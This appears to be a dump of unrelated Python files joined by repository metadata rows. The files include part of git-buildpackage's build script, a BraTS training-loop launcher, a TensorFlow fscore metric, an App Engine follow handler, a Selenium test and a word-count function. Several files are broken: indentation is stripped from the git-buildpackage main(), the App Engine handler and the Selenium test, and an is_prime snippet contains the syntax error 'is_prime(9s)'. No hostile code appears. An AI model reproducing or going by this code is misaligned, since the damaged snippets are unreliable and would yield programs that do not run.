def git_archive_build_orig(repo, cp, output_dir, options):
    """
    Build the orig tarball using git-archive

    @param cp: the changelog of the package we're acting on
    @type cp: L{ChangeLog}
    @param output_dir: where to put the tarball
    @type output_dir: C{Str}
    @param options: the parsed options
    @type options: C{dict} of options
    @return: the tree the tarball was built from
    @rtype: C{str}
    @raises GbpError: when creating the tarball fails
    """
    tree = get_upstream_tree(repo, cp, options)
    orig = du.orig_file(cp, options.comp_type)
    gbp.log.info("%s does not exist, creating from '%s'" % (orig, tree))
    gbp.log.debug("Building upstream tarball with compression '%s -%s'" %
                  (options.comp_type, options.comp_level))
    created = git_archive(repo, cp, output_dir, tree,
                          options.comp_type,
                          options.comp_level,
                          options.with_submodules)
    if not created:
        raise GbpError("Cannot create upstream tarball at '%s'" % output_dir)
    return tree
def guess_comp_type(repo, comp_type, cp, tarball_dir):
    """
    Guess the compression type for the upstream tarball

    An explicitly given type (other than C{auto}) is used after
    normalizing aliases. With C{auto} the pristine-tar branch is
    consulted first; without one, any existing orig tarball in
    I{tarball_dir} determines the type. The fallback is C{gzip}.

    @param repo: the git repository
    @param comp_type: compression type given on the command line
    @param cp: the package's changelog
    @param tarball_dir: where to look for existing orig tarballs
    @return: the compression type (a key of L{compressor_opts})
    @rtype: C{str}
    @raises GbpError: when multiple orig tarballs are found
    """
    srcpkg = cp['Source']
    upstream_version = cp['Upstream-Version']

    if comp_type != 'auto':
        comp_type = compressor_aliases.get(comp_type, comp_type)
        # Membership test instead of a try/except with a dummy lookup:
        if comp_type not in compressor_opts:
            gbp.log.warn("Unknown compression type - guessing.")
            comp_type = 'auto'

    if comp_type == 'auto':
        if not repo.has_pristine_tar_branch():
            if not tarball_dir:
                tarball_dir = '..'
            detected = None
            for comp in compressor_opts.keys():
                if du.DebianPkgPolicy.has_orig(du.orig_file(cp, comp), tarball_dir):
                    if detected is not None:
                        raise GbpError("Multiple orig tarballs found.")
                    detected = comp
            comp_type = detected if detected is not None else 'gzip'
        else:
            # Raw string and escaped dots so '.orig.tar.' is matched
            # literally instead of '.' matching any character:
            regex = r'pristine-tar .* %s_%s\.orig\.tar\.' % (srcpkg, upstream_version)
            commits = repo.grep_log(regex, repo.pristine_tar_branch)
            if commits:
                commit = commits[-1]
                gbp.log.debug("Found pristine-tar commit at '%s'" % commit)
            else:
                commit = repo.pristine_tar_branch
            tarball = repo.get_subject(commit)
            comp_type = du.DebianPkgPolicy.get_compression(tarball)
            gbp.log.debug("Determined compression type '%s'" % comp_type)
            if not comp_type:
                comp_type = 'gzip'
                gbp.log.warn("Unknown compression type of %s, assuming %s" % (tarball, comp_type))
    return comp_type
def setup_pbuilder(options):
    """
    Configure options and environment for building via git-pbuilder

    Overrides the builder and cleaner commands and exports the
    environment variables git-pbuilder evaluates.
    """
    if not (options.use_pbuilder or options.use_qemubuilder):
        return

    options.builder = 'git-pbuilder'
    options.cleaner = '/bin/true'

    env = {'DIST': options.pbuilder_dist}
    if options.pbuilder_arch:
        env['ARCH'] = options.pbuilder_arch
    if options.use_qemubuilder:
        env['BUILDER'] = "qemubuilder"
    if not options.pbuilder_autoconf:
        env['GIT_PBUILDER_AUTOCONF'] = "no"
    if options.pbuilder_options:
        env['GIT_PBUILDER_OPTIONS'] = options.pbuilder_options
    os.environ.update(env)
def disable_hooks(options):
    """Disable all hooks (except for builder)"""
    hooks = ('cleaner', 'postexport', 'prebuild', 'postbuild', 'posttag')
    for name in hooks:
        if not getattr(options, name):
            continue
        gbp.log.info("Disabling '%s' hook" % name)
        setattr(options, name, '')
def parse_args(argv, prefix):
    """
    Parse the command line arguments

    Arguments starting with I{--<prefix>} are handled here, everything
    else is passed on to the package build command.

    @param argv: the command line arguments including C{argv[0]}
    @param prefix: the option prefix that separates our options from
        the builder's (e.g. C{git-})
    @return: (parsed options, our args, args for the build command),
        or (None, None, None) on errors
    """
    # Split the command line: options carrying the prefix are ours, the
    # remainder is handed to the build command (e.g. dpkg-buildpackage)
    args = [ arg for arg in argv[1:] if arg.find('--%s' % prefix) == 0 ]
    dpkg_args = [ arg for arg in argv[1:] if arg.find('--%s' % prefix) == -1 ]

    # We handle these although they don't have a --git- prefix
    for arg in [ "--help", "-h", "--version" ]:
        if arg in dpkg_args:
            args.append(arg)

    try:
        parser = GbpOptionParserDebian(command=os.path.basename(argv[0]), prefix=prefix)
    except ConfigParser.ParsingError as err:
        # Broken gbp.conf - nothing sensible we can do
        gbp.log.err(err)
        return None, None, None

    # Option groups keep the --help output readable
    tag_group = GbpOptionGroup(parser, "tag options", "options related to git tag creation")
    branch_group = GbpOptionGroup(parser, "branch options", "branch layout options")
    cmd_group = GbpOptionGroup(parser, "external command options", "how and when to invoke external commands and hooks")
    orig_group = GbpOptionGroup(parser, "orig tarball options", "options related to the creation of the orig tarball")
    export_group = GbpOptionGroup(parser, "export build-tree options", "alternative build tree related options")
    parser.add_option_group(tag_group)
    parser.add_option_group(orig_group)
    parser.add_option_group(branch_group)
    parser.add_option_group(cmd_group)
    parser.add_option_group(export_group)

    parser.add_boolean_config_file_option(option_name = "ignore-new", dest="ignore_new")
    parser.add_option("--git-verbose", action="store_true", dest="verbose", default=False,
                      help="verbose command execution")
    parser.add_config_file_option(option_name="color", dest="color", type='tristate')
    parser.add_config_file_option(option_name="color-scheme",
                                  dest="color_scheme")
    parser.add_config_file_option(option_name="notify", dest="notify", type='tristate')
    tag_group.add_option("--git-tag", action="store_true", dest="tag", default=False,
                      help="create a tag after a successful build")
    tag_group.add_option("--git-tag-only", action="store_true", dest="tag_only", default=False,
                      help="don't build, only tag and run the posttag hook")
    tag_group.add_option("--git-retag", action="store_true", dest="retag", default=False,
                      help="don't fail if the tag already exists")
    tag_group.add_boolean_config_file_option(option_name="sign-tags", dest="sign_tags")
    tag_group.add_config_file_option(option_name="keyid", dest="keyid")
    tag_group.add_config_file_option(option_name="debian-tag", dest="debian_tag")
    tag_group.add_config_file_option(option_name="upstream-tag", dest="upstream_tag")
    orig_group.add_config_file_option(option_name="upstream-tree", dest="upstream_tree")
    orig_group.add_boolean_config_file_option(option_name="pristine-tar", dest="pristine_tar")
    orig_group.add_boolean_config_file_option(option_name="pristine-tar-commit",
                                              dest="pristine_tar_commit")
    orig_group.add_config_file_option(option_name="force-create", dest="force_create",
                      help="force creation of orig tarball", action="store_true")
    orig_group.add_config_file_option(option_name="no-create-orig", dest="no_create_orig",
                      help="don't create orig tarball", action="store_true")
    orig_group.add_config_file_option(option_name="tarball-dir", dest="tarball_dir", type="path",
                      help="location to look for external tarballs")
    orig_group.add_config_file_option(option_name="compression", dest="comp_type",
                      help="Compression type, default is '%(compression)s'")
    orig_group.add_config_file_option(option_name="compression-level", dest="comp_level",
                      help="Compression level, default is '%(compression-level)s'")
    branch_group.add_config_file_option(option_name="upstream-branch", dest="upstream_branch")
    branch_group.add_config_file_option(option_name="debian-branch", dest="debian_branch")
    branch_group.add_boolean_config_file_option(option_name = "ignore-branch", dest="ignore_branch")
    branch_group.add_boolean_config_file_option(option_name = "submodules", dest="with_submodules")
    cmd_group.add_config_file_option(option_name="builder", dest="builder",
                      help="command to build the Debian package, default is '%(builder)s'")
    cmd_group.add_config_file_option(option_name="cleaner", dest="cleaner",
                      help="command to clean the working copy, default is '%(cleaner)s'")
    cmd_group.add_config_file_option(option_name="prebuild", dest="prebuild",
                      help="command to run before a build, default is '%(prebuild)s'")
    cmd_group.add_config_file_option(option_name="postexport", dest="postexport",
                      help="command to run after exporting the source tree, default is '%(postexport)s'")
    cmd_group.add_config_file_option(option_name="postbuild", dest="postbuild",
                      help="hook run after a successful build, default is '%(postbuild)s'")
    cmd_group.add_config_file_option(option_name="posttag", dest="posttag",
                      help="hook run after a successful tag operation, default is '%(posttag)s'")
    cmd_group.add_boolean_config_file_option(option_name="pbuilder", dest="use_pbuilder")
    cmd_group.add_boolean_config_file_option(option_name="qemubuilder", dest="use_qemubuilder")
    cmd_group.add_config_file_option(option_name="dist", dest="pbuilder_dist")
    cmd_group.add_config_file_option(option_name="arch", dest="pbuilder_arch")
    cmd_group.add_boolean_config_file_option(option_name = "pbuilder-autoconf", dest="pbuilder_autoconf")
    cmd_group.add_config_file_option(option_name="pbuilder-options", dest="pbuilder_options")
    cmd_group.add_boolean_config_file_option(option_name="hooks", dest="hooks")
    export_group.add_config_file_option(option_name="export-dir", dest="export_dir", type="path",
                      help="before building the package export the source into EXPORT_DIR, default is '%(export-dir)s'")
    export_group.add_config_file_option("export", dest="export",
                      help="export treeish object TREEISH, default is '%(export)s'", metavar="TREEISH")
    export_group.add_boolean_config_file_option(option_name="purge", dest="purge")
    export_group.add_option("--git-dont-purge", action="store_true", dest="dont_purge", default=False,
                      help="deprecated, use --git-no-purge instead")
    export_group.add_boolean_config_file_option(option_name="overlay", dest="overlay")
    options, args = parser.parse_args(args)

    gbp.log.setup(options.color, options.verbose, options.color_scheme)
    if not options.hooks:
        disable_hooks(options)
    # --git-retag is only meaningful together with one of the tag options
    if options.retag:
        if not options.tag and not options.tag_only:
            gbp.log.err("'--%sretag' needs either '--%stag' or '--%stag-only'" % (prefix, prefix, prefix))
            return None, None, None

    # Overlay mode needs a separate directory to unpack the tarball into
    if options.overlay and not options.export_dir:
        gbp.log.err("Overlay must be used with --git-export-dir")
        return None, None, None

    # --git-dont-purge is deprecated:
    if options.dont_purge:
        gbp.log.warning("--git-dont-purge is depreceted, use --git-no-purge instead")
        options.purge = False

    return options, args, dpkg_args
def main(argv):
# Build (and optionally tag) a Debian package from a git repository.
# Returns a process exit status: 0 on success, 1 on any failure.
# NOTE(review): indentation appears to have been stripped when this file
# was ingested; the logical nesting follows git-buildpackage's main().
retval = 0
prefix = "git-"
source = None
branch = None
options, gbp_args, dpkg_args = parse_args(argv, prefix)
if not options:
return 1
try:
repo = DebianGitRepository(os.path.curdir)
except GitRepositoryError:
gbp.log.err("%s is not a git repository" % (os.path.abspath('.')))
return 1
else:
repo_dir = os.path.abspath(os.path.curdir)
try:
# Clean the tree first, then refuse to build with uncommitted changes
# unless --git-ignore-new was given.
Command(options.cleaner, shell=True)()
if not options.ignore_new:
(ret, out) = repo.is_clean()
if not ret:
gbp.log.err("You have uncommitted changes in your source tree:")
gbp.log.err(out)
raise GbpError("Use --git-ignore-new to ignore.")
try:
branch = repo.get_branch()
except GitRepositoryError:
# Not being on any branch is o.k. with --git-ignore-branch
if not options.ignore_branch:
raise
if not options.ignore_new and not options.ignore_branch:
if branch != options.debian_branch:
gbp.log.err("You are not on branch '%s' but on '%s'" % (options.debian_branch, branch))
raise GbpError("Use --git-ignore-branch to ignore or --git-debian-branch to set the branch name.")
# Snapshot the tree to build from and read the Debian source metadata.
tree = write_tree(repo, options)
source = source_vfs(repo, options, tree)
if not options.tag_only:
output_dir = prepare_output_dir(options.export_dir)
tarball_dir = options.tarball_dir or output_dir
# Get/build the upstream tarball if necessary. We delay this in
# case of a postexport hook so the hook gets a chance to modify the
# sources and create different tarballs (#640382)
# We don't delay it in general since we want to fail early if the
# tarball is missing.
if not source.is_native():
if options.postexport:
gbp.log.info("Postexport hook set, delaying tarball creation")
else:
prepare_upstream_tarball(repo, source.changelog, options, tarball_dir,
output_dir)
# Export to another build dir if requested:
if options.export_dir:
tmp_dir = os.path.join(output_dir, "%s-tmp" % source.sourcepkg)
export_source(repo, tree, source.changelog, options, tmp_dir, output_dir)
# Run postexport hook
if options.postexport:
RunAtCommand(options.postexport, shell=True,
extra_env={'GBP_GIT_DIR': repo.git_dir,
'GBP_TMP_DIR': tmp_dir})(dir=tmp_dir)
major = (source.changelog.debian_version if source.is_native()
else source.changelog.upstream_version)
export_dir = os.path.join(output_dir, "%s-%s" % (source.sourcepkg, major))
gbp.log.info("Moving '%s' to '%s'" % (tmp_dir, export_dir))
move_old_export(export_dir)
os.rename(tmp_dir, export_dir)
# Delayed tarball creation in case a postexport hook is used:
if not source.is_native() and options.postexport:
prepare_upstream_tarball(repo, source.changelog, options, tarball_dir,
output_dir)
if options.export_dir:
build_dir = export_dir
else:
build_dir = repo_dir
if options.prebuild:
RunAtCommand(options.prebuild, shell=True,
extra_env={'GBP_GIT_DIR': repo.git_dir,
'GBP_BUILD_DIR': build_dir})(dir=build_dir)
setup_pbuilder(options)
# Finally build the package:
RunAtCommand(options.builder, dpkg_args, shell=True,
extra_env={'GBP_BUILD_DIR': build_dir})(dir=build_dir)
if options.postbuild:
# Look for the binary .changes file first, then fall back to the
# source-only one.
arch = os.getenv('ARCH', None) or du.get_arch()
changes = os.path.abspath("%s/../%s_%s_%s.changes" %
(build_dir,
source.sourcepkg,
source.changelog.noepoch, arch))
gbp.log.debug("Looking for changes file %s" % changes)
if not os.path.exists(changes):
changes = os.path.abspath("%s/../%s_%s_source.changes" %
(build_dir,
source.sourcepkg,
source.changelog.noepoch))
Command(options.postbuild, shell=True,
extra_env={'GBP_CHANGES_FILE': changes,
'GBP_BUILD_DIR': build_dir})()
# Tagging happens after a successful build (or alone with --git-tag-only).
if options.tag or options.tag_only:
gbp.log.info("Tagging %s" % source.changelog.version)
tag = repo.version_to_tag(options.debian_tag, source.changelog.version)
if options.retag and repo.has_tag(tag):
repo.delete_tag(tag)
repo.create_tag(name=tag,
msg="%s Debian release %s" % (source.sourcepkg,
source.changelog.version),
sign=options.sign_tags, keyid=options.keyid)
if options.posttag:
sha = repo.rev_parse("%s^{}" % tag)
Command(options.posttag, shell=True,
extra_env={'GBP_TAG': tag,
'GBP_BRANCH': branch or '(no branch)',
'GBP_SHA1': sha})()
except CommandExecFailed:
retval = 1
except (GbpError, GitRepositoryError) as err:
if len(err.__str__()):
gbp.log.err(err)
retval = 1
except DebianSourceError as err:
gbp.log.err(err)
source = None
retval = 1
finally:
# Always drop the temporary index and clean up the export dir; send a
# desktop notification about the result if configured.
drop_index()
if not options.tag_only:
if options.export_dir and options.purge and not retval:
RemoveTree(export_dir)()
if source and not gbp.notifications.notify(source.changelog,
not retval,
options.notify):
gbp.log.err("Failed to send notification")
retval = 1
return retval
# Script entry point: propagate main()'s return value as the exit status.
if __name__ == '__main__':
sys.exit(main(sys.argv))
# vim:et:ts=4:sw=4:et:sts=4:ai:set list listchars=tab\:»·,trail\:·:
| [
"haichengsun123@163.com"
] | haichengsun123@163.com |
b513f222fdaffe800eb13434b6c68a58cf123706 | 94becda0e99eb1bf23f2649d63a6a2af0f631e33 | /brats/bak/loop_finetune_v100_bak.py | fc472ca5384a7149a43deaf323fcf73f85ea7cfd | [
"MIT"
] | permissive | guusgrimbergen/3DUnetCNN_BRATS | d560a878dfbe7dfe95ca5a37c8b066199300d276 | 1c4ad386b66c550770adc8c9e7371c1ce476db94 | refs/heads/master | 2022-01-08T13:37:05.253386 | 2019-06-17T13:10:59 | 2019-06-17T13:10:59 | 185,376,310 | 0 | 0 | null | 2019-05-07T10:07:33 | 2019-05-07T10:07:32 | null | UTF-8 | Python | false | false | 3,151 | py | from brats.config import config, config_unet, config_dict
import datetime
import logging
import threading
import subprocess
import os
import sys
from subprocess import Popen, PIPE, STDOUT
from unet3d.utils.path_utils import make_dir
from unet3d.utils.path_utils import get_model_h5_filename
from unet3d.utils.path_utils import get_filename_without_extension
config.update(config_unet)
# pp = pprint.PrettyPrinter(indent=4)
# # pp.pprint(config)
config.update(config_unet)
def run(model_filename, out_file, cmd):
    """Announce and execute one training command.

    Args:
        model_filename: identifier of the model being processed (purely
            informational here; kept for interface compatibility).
        out_file: path of the log file the command is expected to write.
        cmd: shell command line, executed via os.system.

    Returns:
        The exit status reported by os.system (0 on success). The original
        discarded this status, so failed runs were indistinguishable from
        successful ones; callers may now (optionally) check it.
    """
    print("=" * 120)
    print(">> processing:", cmd)
    print("log to:", out_file)
    print(cmd)
    # NOTE(review): os.system passes cmd through the shell; acceptable for
    # these internally-built commands, but subprocess.run would be safer.
    return os.system(cmd)
# Grid-search driver: enumerate every (model, denoise, normalize,
# hist-match, loss) combination, build the model/log file names and the
# training command for each, then execute them in random order.
task = "finetune"
is_test = "0"
model_list = list()
cmd_list = list()
out_file_list = list()
for model_name in ["unet", "isensee"]:
for is_denoise in config_dict["is_denoise"]:
for is_normalize in config_dict["is_normalize"]:
for is_hist_match in ["0", "1"]:
for loss in ["minh", "weighted"]:
patch_shape = "160-192-128"
log_folder = "log"
make_dir(log_folder)
# Date stamp (YYYYMMDD) embedded in the log file name.
d = datetime.date.today()
year_current = d.year
month_current = '{:02d}'.format(d.month)
date_current = '{:02d}'.format(d.day)
model_filename = get_filename_without_extension(get_model_h5_filename(
datatype="model",
is_bias_correction="1",
is_denoise=is_denoise,
is_normalize=is_normalize,
is_hist_match=is_hist_match,
depth_unet=4,
n_base_filters_unet=16,
model_name=model_name,
patch_shape=patch_shape,
is_crf="0",
is_test=is_test,
loss=loss,
model_dim=2))
out_file = "{}/{}{}{}_{}_out.log".format(
log_folder,
year_current,
month_current,
date_current,
model_filename)
# NOTE(review): the filename above embeds the loop's `loss` and
# model_dim=2, while the command below hard-codes loss "minh" and
# passes -dim 3 -- confirm this mismatch is intentional.
cmd = "python brats/{}.py -t \"{}\" -o \"0\" -n \"{}\" -de \"{}\" -hi \"{}\" -ps \"{}\" -l \"{}\" -m \"{}\" -ba 1 -dim 3".format(
task,
is_test,
is_normalize,
is_denoise,
is_hist_match,
patch_shape,
"minh",
model_name
)
model_list.append(model_filename)
out_file_list.append(out_file)
cmd_list.append(cmd)
# Shuffle so concurrently started workers pick different configurations.
import random
combined = list(zip(model_list, out_file_list, cmd_list))
random.shuffle(combined)
# NOTE(review): slice-assignment keeps model_list/out_file_list as lists but
# rebinds cmd_list to a tuple -- inconsistent, though harmless here.
model_list[:], out_file_list[:], cmd_list = zip(*combined)
for i in range(len(model_list)):
model_filename = model_list[i]
out_file = out_file_list[i]
cmd = cmd_list[i]
run(model_filename, out_file, cmd) | [
"minhmanutd@gmail.com"
] | minhmanutd@gmail.com |
4b2d690ae6f95c54796fa8e489349c37bedc6da5 | 240544a6e94996ae58f9e37a854dfeef888dfd9d | /nosetests.py | ff9698c6b62f87de52c23dd31a6324e817c09c64 | [
"MIT"
] | permissive | jankoslavic/py-tools | e7808e78fca97950f8e5d3e6cdb3156bb8dd5968 | dfc79507e90e1beaa8297fb48b197990b24d0929 | refs/heads/master | 2021-01-01T06:51:05.556669 | 2020-12-28T06:17:38 | 2020-12-28T06:17:38 | 37,326,059 | 15 | 11 | null | 2016-02-07T19:34:11 | 2015-06-12T14:18:53 | Jupyter Notebook | UTF-8 | Python | false | false | 40 | py | def test_numbers():
assert 12 == 12
| [
"janko.slavic@gmail.com"
] | janko.slavic@gmail.com |
35af21c694adef7b09cbc80926fda010c74caf6e | 7a6aca7d300c0752f2a73730b743a1a7361e941b | /tensorflow_graphics/nn/metric/fscore.py | 8bb696c3919b2925c77ede8d7b9ae9e1851fd458 | [
"Apache-2.0"
] | permissive | tensorflow/graphics | ef0abe102398a58eb7c41b709393df3d0b0a2811 | 1b0203eb538f2b6a1013ec7736d0d548416f059a | refs/heads/master | 2023-09-03T20:41:25.992578 | 2023-08-08T21:16:36 | 2023-08-08T21:17:31 | 164,626,274 | 2,920 | 413 | Apache-2.0 | 2023-08-27T14:26:47 | 2019-01-08T10:39:44 | Python | UTF-8 | Python | false | false | 3,437 | py | # Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module implements the fscore metric."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Any, Callable
import tensorflow as tf
from tensorflow_graphics.nn.metric import precision as precision_module
from tensorflow_graphics.nn.metric import recall as recall_module
from tensorflow_graphics.util import export_api
from tensorflow_graphics.util import safe_ops
from tensorflow_graphics.util import shape
from tensorflow_graphics.util import type_alias
def evaluate(ground_truth: type_alias.TensorLike,
             prediction: type_alias.TensorLike,
             precision_function: Callable[..., Any] = precision_module.evaluate,
             recall_function: Callable[..., Any] = recall_module.evaluate,
             name: str = "fscore_evaluate") -> tf.Tensor:
  """Computes the fscore metric for the given ground truth and predictions.

  The fscore is the harmonic mean of precision and recall:
  2 * (precision * recall) / (precision + recall), where both quantities are
  produced by the supplied evaluation functions (defaulting to their binary
  ground-truth/prediction definitions, see
  https://en.wikipedia.org/wiki/Precision_and_recall).

  Note:
    In the following, A1 to An are optional batch dimensions, which must be
    broadcast compatible.

  Args:
    ground_truth: A tensor of shape `[A1, ..., An, N]` holding the ground
      truth values along the last axis.
    prediction: A tensor of shape `[A1, ..., An, N]` holding the predicted
      values along the last axis.
    precision_function: Function used to evaluate the precision; defaults to
      the binary precision evaluation.
    recall_function: Function used to evaluate the recall; defaults to the
      binary recall evaluation.
    name: A name for this op. Defaults to "fscore_evaluate".

  Returns:
    A tensor of shape `[A1, ..., An]` containing the fscore for the given
    ground truth labels and predictions.

  Raises:
    ValueError: if the shape of `ground_truth` or `prediction` is not
      supported.
  """
  with tf.name_scope(name):
    labels = tf.convert_to_tensor(value=ground_truth)
    predicted = tf.convert_to_tensor(value=prediction)
    shape.compare_batch_dimensions(
        tensors=(labels, predicted),
        tensor_names=("ground_truth", "prediction"),
        last_axes=-1,
        broadcast_compatible=True)
    recall = recall_function(labels, predicted)
    precision = precision_function(labels, predicted)
    # safe_signed_div guards against division by zero when both precision
    # and recall are zero.
    return safe_ops.safe_signed_div(2 * precision * recall,
                                    precision + recall)
# API contains all public functions and classes.
__all__ = export_api.get_functions_and_classes()
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
c8e339a91dc7b41046270aadb80c7d13e20e148b | 12f511a13fe95264a16409fce37974b5ab90ca90 | /actionUser.py | f237d7538e0c9decbc0633de54be518153f39fd2 | [] | no_license | rihenvora/Instagram-Clone | 9150abf2a66b9918c4204b963b3285fe289c1826 | 26e32adc3df104e128ba5584e4b53758b2caa97b | refs/heads/master | 2022-11-04T15:29:15.583890 | 2020-06-22T12:18:17 | 2020-06-22T12:18:17 | 274,128,023 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,760 | py | import webapp2
import jinja2
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.ext import blobstore
from google.appengine.ext.webapp import blobstore_handlers
import os
import urlparse
from google.appengine.api import images
from instagramdb import *
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True
)
class actionUser(webapp2.RequestHandler):
# Handles follow/unfollow actions between two datastore User entities.
def get(self):
# Query params: key1 = id of the viewed/searched user,
# key2 = action ('0' = follow, '1' = unfollow),
# key3 = id of the currently logged-in ("main") user.
self.response.headers['Content-Type'] = 'text/html'
follower=self.request.get("key1") #searched user
action=self.request.get("key2") #action
following=self.request.get("key3") # main user
flow_users= [] #rebuilt follows list for the main user
flwing_user = [] #rebuilt follower list for the searched user
# Load both entities by numeric datastore id.
follower_user = ndb.Key('User',int(follower)).get()
following_user = ndb.Key('User',int(following)).get()
if action == '0':
# Follow: record the relationship on both entities.
# NOTE(review): 'fllower'/'folows' look misspelled but must match the
# User model's field names, so they are left untouched.
follower_user.fllower.append(following)
following_user.folows.append(follower)
follower_user.put()
following_user.put()
elif action == '1':
# Unfollow: rebuild both lists without the other party's id.
for user in following_user.folows:
if follower != user:
flow_users.append(user)
for user in follower_user.fllower:
if following != user:
flwing_user.append(user)
following_user.folows = flow_users
following_user.put()
follower_user.fllower = flwing_user
follower_user.put()
#self.redirect('/details?key='+follower)
self.redirect('/')
| [
"noreply@github.com"
] | noreply@github.com |
961e76ad1d6a22225b91b5f9e9b5a45cc59f4df6 | f8095636248bac9e2b018ed3b06f36502edffb0b | /frontend_issuu_autotest_replica/tests_pro_account/TestQuickTourPRO.py | ede810b50de37975ec611870bca9add110124b14 | [] | no_license | slashsorin/auto-fe-test | deb1c696767b1c31125970679aa8ce4364fa956a | 266f3d7badb14c388edc63139bf659f60e09ac64 | refs/heads/master | 2016-08-04T10:22:18.123109 | 2013-11-22T09:16:57 | 2013-11-22T09:16:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,575 | py | import sys, time, os
#sys.path.append('/Users/Sorin/Issuu/new_eclipse_ws/frontend-issuu-autotest/autotest_framework/')
sys.path.append('../autotest_framework')
import SeleniumTestCase, make_platform_classes
import SetTestStatus as sts
import unittest, xmlrunner
class TestQuickTourPRO(SeleniumTestCase.SeleniumTestCase):
# Selenium RC smoke test: the signup "quick tour" page renders for an
# anonymous visitor, survives a PRO-account login, and renders again.
def test_quick_tour(self):
try:
sel = self.selenium
sel.set_speed("500")
# Anonymous visit of the quick-tour page.
sel.open("/signup/quicktour")
sel.wait_for_page_to_load("60000")
self.assertEqual("Issuu - Signup - A quick tour", sel.get_title())
# Key layout elements must be present before login.
self.failUnless(sel.is_element_present("xpath=//div[2]/div[4]/img"))
self.failUnless(sel.is_element_present("link=issuu"))
self.failUnless(sel.is_element_present("id=t3BodyTop"))
self.failUnless(sel.is_element_present("xpath=//div[2]/div[1]/div"))
self.failUnless(sel.is_element_present("xpath=//span[@class='system-blue-shade-fat-btn-text']/strong"))
# Log in with the PRO test account.
sel.click("id=loginLink")
sel.wait_for_page_to_load("60000")
sel.type("id=username", "PROaccount")
sel.type("id=password", "autotest")
sel.click("xpath=//span[@class='system-blue-shade-fat-btn-text']//strong[.='Log in']")
sel.wait_for_page_to_load("60000")
# Same page checks again while authenticated.
self.assertEqual("Issuu - Signup - A quick tour", sel.get_title())
self.failUnless(sel.is_element_present("xpath=//div[2]/div[4]/img"))
self.failUnless(sel.is_element_present("link=issuu"))
self.failUnless(sel.is_element_present("id=t3BodyTop"))
self.failUnless(sel.is_element_present("xpath=//div[2]/div[1]/div"))
self.failUnless(sel.is_element_present("xpath=//span[@class='system-blue-shade-fat-btn-text']/strong"))
sel.click("link=Log out")
sel.wait_for_page_to_load("60000")
#print self.__class__.__name__ + " passed!"
#sts.set_test_status(self.selenium.get_eval("selenium.sessionId"), passed=True)
# NOTE(review): this silently skips the test body when self.selenium is
# missing; real assertion failures still propagate. failUnless is the
# deprecated alias of assertTrue.
except AttributeError:
pass
#except: # catch *all* exceptions
#if sys.exc_info()[1]:
#sts.set_test_status(self.selenium.get_eval("selenium.sessionId"), passed=False)
#print self.__class__.__name__ + " failed!"
globals().update(make_platform_classes.make_platform_classes(TestQuickTourPRO))
if __name__ == '__main__':
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='../test_reports')) | [
"sorin.dimo@yahoo.com"
] | sorin.dimo@yahoo.com |
a8a6e16575d5448ec39c87efc4e2a31efdc133ee | 288f9764ebf4be88fb1e4436f49953e42589a0c3 | /lesson9/test.py | be47ba579f72e3b22e8d38f495a59de90bbea29d | [] | no_license | RenardMBM/yandex.lyceum | 34657386d07786332ee950375abb3ba176044864 | 15c71a1ebe8ec73fe3b68a5fc6e23e7d49e6f8ca | refs/heads/master | 2020-03-29T11:25:41.447024 | 2018-10-22T01:38:39 | 2018-10-22T01:38:39 | 149,852,015 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | def is_prime(n):
if type(n) != int:
# check type
raise TypeError()
elif n <= 1:
# check
raise ValueError()
# error was here: range(2, k) doesn't include k
# hence, for example, for 9 only divisor 2 will be checked
for divisor in range(2, int(n ** 0.5) + 1):
if n % divisor == 0:
return False
return True
print(is_prime(9s)) | [
"renard.mbm@yandex.ru"
] | renard.mbm@yandex.ru |
a52b455dc705da8f9fc3724685f6ef38c3740ff4 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /5pYkwf948KBQ3pNwz_13.py | f195abcf98ede33050c2a8f2b103f9ced9d8120e | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 480 | py |
from collections import Counter
def most_common_words(text, n):
    """Return a dict of the ``n`` most frequent words in ``text``.

    Words are lower-cased runs of alphabetic characters; every other
    character acts as a separator. Ties in frequency are broken by order
    of first appearance in the text. The result maps word -> count and is
    ordered most-frequent first.
    """
    cleaned = "".join(ch if ch.isalpha() else " " for ch in text.lower())
    words = cleaned.split()
    # Record each word's first position so that equal counts keep their
    # original encounter order after sorting.
    first_seen = {}
    for position, word in enumerate(words):
        first_seen.setdefault(word, position)
    counts = Counter(words)
    ranked = sorted(counts.items(),
                    key=lambda pair: (-pair[1], first_seen[pair[0]]))
    # max(n, 0) mirrors the original range(min(n, len)) guard: a negative
    # or zero n yields an empty result rather than slicing from the end.
    return dict(ranked[:max(n, 0)])
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
0c8460f781db165f87f97883989a2feef5e75c7d | aaeaf969b31043bc3cbac2f25aef65dc8b5c8027 | /gen-nginx-conf.py | 10c20c4e8d1f0a023e2102deb7eb2625dddf3983 | [] | no_license | unknown0xff/nginx | c939f20ef76164680ee87cf2d1fe056944aec2e9 | d4f8a1b506bd0bc8f37ad57816b554703f6814b6 | refs/heads/master | 2022-11-22T17:24:58.668992 | 2020-07-28T03:02:44 | 2020-07-28T03:02:44 | 283,059,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,304 | py | #!/usr/bin/python3
#coding=utf-8
import sys
import os
template = '''\
